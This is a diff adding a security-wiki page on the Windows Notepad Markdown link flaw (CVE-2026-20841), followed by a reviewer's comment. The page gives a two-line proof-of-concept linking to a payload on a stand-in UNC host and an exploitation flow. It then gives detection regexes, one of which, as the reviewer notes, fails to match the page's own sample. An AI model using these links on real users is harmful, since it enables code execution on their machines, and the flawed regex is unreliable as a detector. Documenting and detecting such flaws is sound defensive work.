| 1 | +# Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers) |
| 2 | + |
| 3 | +{{#include ../banners/hacktricks-training.md}} |
| 4 | + |
| 5 | +Modern Windows applications that render Markdown/HTML often turn user-supplied links into clickable elements and hand them to `ShellExecuteExW`. Without strict scheme allowlisting, any registered protocol handler (e.g., `file:`, `ms-appinstaller:`) can be triggered, leading to code execution in the current user context. |
| 6 | + |
| 7 | +## ShellExecuteExW surface in Windows Notepad Markdown mode |
| 8 | +- Notepad chooses Markdown mode **only for `.md` extensions** via a fixed string comparison in `sub_1400ED5D0()`. |
| 9 | +- Supported Markdown links: |
| 10 | + - Standard: `[text](target)` |
| 11 | + - Autolink: `<target>` (rendered as `[target](target)`), so both syntaxes matter for payloads and detections. |
| 12 | +- Link clicks are processed in `sub_140170F60()`, which performs weak filtering and then calls `ShellExecuteExW`. |
| 13 | +- `ShellExecuteExW` dispatches to **any configured protocol handler**, not just HTTP(S). |
| 14 | + |
| 15 | +### Payload considerations |
| 16 | +- Any `\\` sequences in the link are **normalized to `\`** before `ShellExecuteExW`, impacting UNC/path crafting and detection. |
| 17 | +- `.md` files are **not associated with Notepad by default**; the victim must still open the file in Notepad and click the link, but once rendered, the link is clickable. |
| 18 | +- Dangerous example schemes: |
| 19 | + - `file://` to launch a local/UNC payload. |
| 20 | + - `ms-appinstaller://` to trigger App Installer flows. Other locally registered schemes may also be abusable. |
| 21 | + |
| 22 | +### Minimal PoC Markdown |
| 23 | +```markdown |
| 24 | +[run](file://\\192.0.2.10\\share\\evil.exe) |
| 25 | +<ms-appinstaller://\\192.0.2.10\\share\\pkg.appinstaller> |
| 26 | +``` |
| 27 | + |
| 28 | +### Exploitation flow |
| 29 | +1. Craft a **`.md` file** so Notepad renders it as Markdown. |
| 30 | +2. Embed a link using a dangerous URI scheme (`file:`, `ms-appinstaller:`, or any installed handler). |
| 31 | +3. Deliver the file (HTTP/HTTPS/FTP/IMAP/NFS/POP3/SMTP/SMB or similar) and convince the user to open it in Notepad. |
| 32 | +4. On click, the **normalized link** is handed to `ShellExecuteExW` and the corresponding protocol handler executes the referenced content in the user’s context. |
| 33 | + |
| 34 | +## Detection ideas |
| 35 | +- Monitor transfers of `.md` files over ports/protocols that commonly deliver documents: `20/21 (FTP)`, `80 (HTTP)`, `443 (HTTPS)`, `110 (POP3)`, `143 (IMAP)`, `25/587 (SMTP)`, `139/445 (SMB/CIFS)`, `2049 (NFS)`, `111 (portmap)`. |
| 36 | +- Parse Markdown links (standard and autolink) and look for **case-insensitive** `file:` or `ms-appinstaller:`. |
| 37 | +- Vendor-guided regexes to catch remote resource access: |
| 38 | +``` |
| 39 | +(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4} |
| 40 | +(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2} |
| 41 | +``` |
| 42 | +- Patch behavior reportedly **allowlists local files and HTTP(S)**; anything else reaching `ShellExecuteExW` is suspicious. Extend detections to other installed protocol handlers as needed, since attack surface varies by system. |
| 43 | + |
| 44 | +## References |
| 45 | +- [CVE-2026-20841: Arbitrary Code Execution in the Windows Notepad](https://www.thezdi.com/blog/2026/2/19/cve-2026-20841-arbitrary-code-execution-in-the-windows-notepad) |
| 46 | +- [CVE-2026-20841 PoC](https://github.com/BTtea/CVE-2026-20841-PoC) |
| 47 | + |
| 48 | +{{#include ../banners/hacktricks-training.md}} |
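Review bot: the `file:` detection regex in the "Detection ideas" section does not match the page's own PoC line. `(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}` requires four consecutive `/` or `\\` tokens after `file:`, but `[run](file://\\192.0.2.10\\share\\evil.exe)` supplies only three (`/`, `/`, `\\`) before `192`, so the sample rule misses the sample payload. Either show the PoC in the form the rule targets (e.g. `file:////host/share/...` or `file://\\\\host\\share\\...`) or relax the quantifier (e.g. `{2,}`) and say so, otherwise readers copying both will get a false negative on their first test. The second rule, `(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}`, does match the autolink PoC. Also, the bullet just above asks for case-insensitive matching of `file:` / `ms-appinstaller:`, but neither regex carries an `(?i)` flag or a note to set it in the engine; add that so `FILE:` or `File:` variants are not missed.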